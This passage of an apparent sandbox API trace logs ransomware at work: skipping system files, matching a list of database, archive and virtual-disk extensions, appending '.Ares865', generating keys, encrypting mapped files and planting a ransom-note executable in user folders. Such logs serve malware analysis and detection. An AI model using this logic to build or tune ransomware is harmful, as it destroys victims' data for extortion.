dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0089.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.884] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.884] CloseHandle (hObject=0x15c) returned 1 [0089.884] CloseHandle (hObject=0x118) returned 1 [0089.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.884] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x249fa376, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae0e8854, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae0e8854, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0xd5310, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", cAlternateFileName="HELP{9~1.H1Q")) returned 1 [0089.885] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.885] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="aoldtz.exe") returned 1 [0089.885] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2=".") returned 1 [0089.885] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="..") returned 1 [0089.885] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="windows") returned -1 [0089.885] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="bootmgr") returned 1 [0089.885] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="temp") returned -1 [0089.885] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="pagefile.sys") returned -1 [0089.885] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="boot") returned 1 [0089.885] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="ids.txt") returned -1 [0089.885] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="ntuser.dat") returned -1 [0089.885] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="perflogs") returned -1 [0089.885] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="MSBuild") returned -1 [0089.885] lstrlenW (lpString="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned 46 [0089.885] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck") returned 76 [0089.885] lstrcpyW (in: lpString1=0x2cce472, lpString2="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q" | out: lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q" [0089.885] lstrlenW (lpString="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned 46 [0089.885] lstrlenW (lpString="Ares865") returned 7 [0089.885] lstrcmpiW (lpString1="95}.H1Q", lpString2="Ares865") returned -1 [0089.885] lstrlenW (lpString=".dll") returned 4 [0089.885] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2=".dll") returned 1 [0089.885] lstrlenW (lpString=".lnk") returned 4 [0089.885] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2=".lnk") returned 1 [0089.885] lstrlenW (lpString=".ini") returned 4 [0089.885] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2=".ini") returned 1 [0089.885] lstrlenW (lpString=".sys") returned 4 [0089.885] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2=".sys") returned 1 [0089.885] lstrlenW (lpString="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned 46 [0089.885] lstrlenW (lpString="bak") returned 3 [0089.885] lstrcmpiW (lpString1="H1Q", lpString2="bak") returned 1 [0089.885] lstrlenW (lpString="ba_") returned 3 [0089.885] lstrcmpiW (lpString1="H1Q", lpString2="ba_") returned 1 [0089.885] lstrlenW (lpString="dbb") returned 3 [0089.885] lstrcmpiW (lpString1="H1Q", lpString2="dbb") returned 1 [0089.885] lstrlenW (lpString="vmdk") returned 4 [0089.885] lstrcmpiW (lpString1=".H1Q", lpString2="vmdk") returned -1 [0089.885] lstrlenW (lpString="rar") returned 3 [0089.886] lstrcmpiW (lpString1="H1Q", lpString2="rar") returned -1 [0089.886] lstrlenW (lpString="zip") returned 3 [0089.886] lstrcmpiW (lpString1="H1Q", lpString2="zip") returned -1 [0089.886] lstrlenW (lpString="tgz") returned 3 [0089.886] lstrcmpiW (lpString1="H1Q", lpString2="tgz") returned -1 [0089.886] lstrlenW (lpString="vbox") returned 4 [0089.886] lstrcmpiW (lpString1=".H1Q", lpString2="vbox") returned -1 [0089.886] lstrlenW (lpString="vdi") returned 3 [0089.886] lstrcmpiW (lpString1="H1Q", lpString2="vdi") returned -1 [0089.886] lstrlenW (lpString="vhd") returned 3 [0089.886] lstrcmpiW (lpString1="H1Q", lpString2="vhd") returned -1 [0089.886] lstrlenW (lpString="vhdx") returned 4 [0089.886] lstrcmpiW (lpString1=".H1Q", lpString2="vhdx") returned -1 [0089.886] lstrlenW (lpString="avhd") returned 4 [0089.886] lstrcmpiW (lpString1=".H1Q", lpString2="avhd") returned -1 [0089.886] lstrlenW (lpString="db") returned 2 [0089.886] lstrcmpiW (lpString1="1Q", lpString2="db") returned -1 [0089.886] lstrlenW (lpString="db2") returned 3 [0089.886] lstrcmpiW (lpString1="H1Q", lpString2="db2") returned 1 [0089.886] lstrlenW (lpString="db3") returned 3 [0089.886] lstrcmpiW (lpString1="H1Q", lpString2="db3") returned 1 [0089.886] lstrlenW (lpString="dbf") returned 3 [0089.886] lstrcmpiW (lpString1="H1Q", lpString2="dbf") returned 1 [0089.886] lstrlenW (lpString="mdf") returned 3 [0089.886] lstrcmpiW (lpString1="H1Q", lpString2="mdf") returned -1 [0089.886] lstrlenW (lpString="mdb") returned 3 [0089.886] lstrcmpiW (lpString1="H1Q", lpString2="mdb") returned -1 [0089.886] lstrlenW (lpString="sql") returned 3 [0089.886] lstrcmpiW (lpString1="H1Q", lpString2="sql") returned -1 [0089.886] lstrlenW (lpString="sqlite") returned 6 [0089.886] lstrcmpiW (lpString1="5}.H1Q", lpString2="sqlite") returned -1 [0089.886] lstrlenW (lpString="sqlite3") returned 7 [0089.886] lstrcmpiW (lpString1="95}.H1Q", lpString2="sqlite3") returned -1 [0089.886] lstrlenW (lpString="sqlitedb") returned 8 [0089.886] lstrcmpiW (lpString1="D95}.H1Q", lpString2="sqlitedb") returned -1 [0089.886] lstrlenW (lpString="xml") returned 3 [0089.886] lstrcmpiW (lpString1="H1Q", lpString2="xml") returned -1 [0089.886] lstrlenW (lpString="$er") returned 3 [0089.887] lstrcmpiW (lpString1="H1Q", lpString2="$er") returned 1 [0089.887] lstrlenW (lpString="4dd") returned 3 [0089.887] lstrcmpiW (lpString1="H1Q", lpString2="4dd") returned 1 [0089.887] lstrlenW (lpString="4dl") returned 3 [0089.887] lstrcmpiW (lpString1="H1Q", lpString2="4dl") returned 1 [0089.887] lstrlenW (lpString="^^^") returned 3 [0089.887] lstrcmpiW (lpString1="H1Q", lpString2="^^^") returned 1 [0089.887] lstrlenW (lpString="abs") returned 3 [0089.887] lstrcmpiW (lpString1="H1Q", lpString2="abs") returned 1 [0089.887] lstrlenW (lpString="abx") returned 3 [0089.887] lstrcmpiW (lpString1="H1Q", lpString2="abx") returned 1 [0089.887] lstrlenW (lpString="accdb") returned 5 [0089.887] lstrcmpiW (lpString1="}.H1Q", lpString2="accdb") returned -1 [0089.887] lstrlenW (lpString="accdc") returned 5 [0089.887] lstrcmpiW (lpString1="}.H1Q", lpString2="accdc") returned -1 [0089.887] lstrlenW (lpString="accde") returned 5 [0089.887] lstrcmpiW (lpString1="}.H1Q", lpString2="accde") returned -1 [0089.887] lstrlenW (lpString="accdr") returned 5 [0089.887] lstrcmpiW (lpString1="}.H1Q", lpString2="accdr") returned -1 [0089.887] lstrlenW (lpString="accdt") returned 5 [0089.887] lstrcmpiW (lpString1="}.H1Q", lpString2="accdt") returned -1 [0089.887] lstrlenW (lpString="accdw") returned 5 [0089.887] lstrcmpiW (lpString1="}.H1Q", lpString2="accdw") returned -1 [0089.887] lstrlenW (lpString="accft") returned 5 [0089.887] lstrcmpiW (lpString1="}.H1Q", lpString2="accft") returned -1 [0089.887] lstrlenW (lpString="adb") returned 3 [0089.887] lstrcmpiW (lpString1="H1Q", lpString2="adb") returned 1 [0089.887] lstrlenW (lpString="adb") returned 3 [0089.887] lstrcmpiW (lpString1="H1Q", lpString2="adb") returned 1 [0089.887] lstrlenW (lpString="ade") returned 3 [0089.887] lstrcmpiW (lpString1="H1Q", lpString2="ade") returned 1 [0089.887] lstrlenW (lpString="adf") returned 3 [0089.887] lstrcmpiW (lpString1="H1Q", lpString2="adf") returned 1 [0089.887] lstrlenW (lpString="adn") returned 3 [0089.887] lstrcmpiW (lpString1="H1Q", lpString2="adn") returned 1 [0089.887] lstrlenW (lpString="adp") returned 3 [0089.887] lstrcmpiW (lpString1="H1Q", lpString2="adp") returned 1 [0089.887] lstrlenW (lpString="alf") returned 3 [0089.888] lstrcmpiW (lpString1="H1Q", lpString2="alf") returned 1 [0089.888] lstrlenW (lpString="ask") returned 3 [0089.888] lstrcmpiW (lpString1="H1Q", lpString2="ask") returned 1 [0089.888] lstrlenW (lpString="btr") returned 3 [0089.888] lstrcmpiW (lpString1="H1Q", lpString2="btr") returned 1 [0089.888] lstrlenW (lpString="cat") returned 3 [0089.888] lstrcmpiW (lpString1="H1Q", lpString2="cat") returned 1 [0089.888] lstrlenW (lpString="cdb") returned 3 [0089.888] lstrcmpiW (lpString1="H1Q", lpString2="cdb") returned 1 [0089.888] lstrlenW (lpString="ckp") returned 3 [0089.888] lstrcmpiW (lpString1="H1Q", lpString2="ckp") returned 1 [0089.888] lstrlenW (lpString="cma") returned 3 [0089.888] lstrcmpiW (lpString1="H1Q", lpString2="cma") returned 1 [0089.888] lstrlenW (lpString="cpd") returned 3 [0089.888] lstrcmpiW (lpString1="H1Q", lpString2="cpd") returned 1 [0089.888] lstrlenW (lpString="dacpac") returned 6 [0089.888] lstrcmpiW (lpString1="5}.H1Q", lpString2="dacpac") returned -1 [0089.888] lstrlenW (lpString="dad") returned 3 [0089.888] lstrcmpiW (lpString1="H1Q", lpString2="dad") returned 1 [0089.888] lstrlenW (lpString="dadiagrams") returned 10 [0089.888] lstrcmpiW (lpString1="32D95}.H1Q", lpString2="dadiagrams") returned -1 [0089.888] lstrlenW (lpString="daschema") returned 8 [0089.888] lstrcmpiW (lpString1="D95}.H1Q", lpString2="daschema") returned -1 [0089.888] lstrlenW (lpString="db-journal") returned 10 [0089.888] lstrcmpiW (lpString1="32D95}.H1Q", lpString2="db-journal") returned -1 [0089.888] lstrlenW (lpString="db-shm") returned 6 [0089.888] lstrcmpiW (lpString1="5}.H1Q", lpString2="db-shm") returned -1 [0089.888] lstrlenW (lpString="db-wal") returned 6 [0089.888] lstrcmpiW (lpString1="5}.H1Q", lpString2="db-wal") returned -1 [0089.888] lstrlenW (lpString="dbc") returned 3 [0089.888] lstrcmpiW (lpString1="H1Q", lpString2="dbc") returned 1 [0089.888] lstrlenW (lpString="dbs") returned 3 [0089.888] lstrcmpiW (lpString1="H1Q", lpString2="dbs") returned 1 [0089.888] lstrlenW (lpString="dbt") returned 3 [0089.888] lstrcmpiW (lpString1="H1Q", lpString2="dbt") returned 1 [0089.888] lstrlenW (lpString="dbv") returned 3 [0089.888] lstrcmpiW (lpString1="H1Q", lpString2="dbv") returned 1 [0089.888] lstrlenW (lpString="dbx") returned 3 [0089.888] lstrcmpiW (lpString1="H1Q", lpString2="dbx") returned 1 [0089.889] lstrlenW (lpString="dcb") returned 3 [0089.889] lstrcmpiW (lpString1="H1Q", lpString2="dcb") returned 1 [0089.889] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.Ares865") returned 111 [0089.889] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.Ares865" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q.ares865"), dwFlags=0x1) returned 1 [0089.890] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.Ares865" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.890] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=873232) returned 1 [0089.890] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.890] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.890] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.890] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.891] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.891] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.891] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd5610, lpName=0x0) returned 0x15c [0089.893] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd5610) returned 0xdd0000 [0089.930] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.931] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.931] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.931] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.931] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.931] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.931] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.931] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.931] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.931] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0089.931] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.931] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0089.931] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.931] UnmapViewOfFile (lpBaseAddress=0xdd0000) returned 1 [0089.939] CloseHandle (hObject=0x15c) returned 1 [0089.939] CloseHandle (hObject=0x118) returned 1 [0089.939] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.939] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.939] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.943] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c8bd1c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.943] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.943] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c8bd1c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0089.943] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.943] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7ab0 [0089.943] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Favorites", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Favorites") returned="C:\\Users\\All Users\\Favorites" [0089.943] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6240 | out: hHeap=0x2b0000) returned 1 [0089.943] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7aa8 | out: hHeap=0x2b0000) returned 1 [0089.943] lstrlenW (lpString="C:\\Users\\All Users\\Favorites") returned 28 [0089.943] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Favorites" | out: lpString1="C:\\Users\\All Users\\Favorites") returned="C:\\Users\\All Users\\Favorites" [0089.943] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.943] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Favorites\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\favorites\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.944] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.944] GetLastError () returned 0x0 [0089.944] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.944] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.944] CloseHandle (hObject=0x120) returned 1 [0089.944] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.944] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.944] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Favorites\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x498632e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x498632e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.945] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.945] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.945] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.945] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x498632e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x498632e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.945] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.945] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.945] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.945] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.945] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x498632e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x498632e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.945] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.945] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x498632e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x498632e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0089.945] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.945] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bb0 [0089.945] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Documents", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Documents") returned="C:\\Users\\All Users\\Documents" [0089.945] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6090 | out: hHeap=0x2b0000) returned 1 [0089.945] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0089.945] lstrlenW (lpString="C:\\Users\\All Users\\Documents") returned 28 [0089.945] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Documents" | out: lpString1="C:\\Users\\All Users\\Documents") returned="C:\\Users\\All Users\\Documents" [0089.945] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.945] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Documents\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\documents\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.946] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.946] GetLastError () returned 0x0 [0089.946] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.946] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.946] CloseHandle (hObject=0x120) returned 1 [0089.946] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.946] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.946] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Documents\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x53342a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53342a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.946] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.946] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.946] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.946] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, 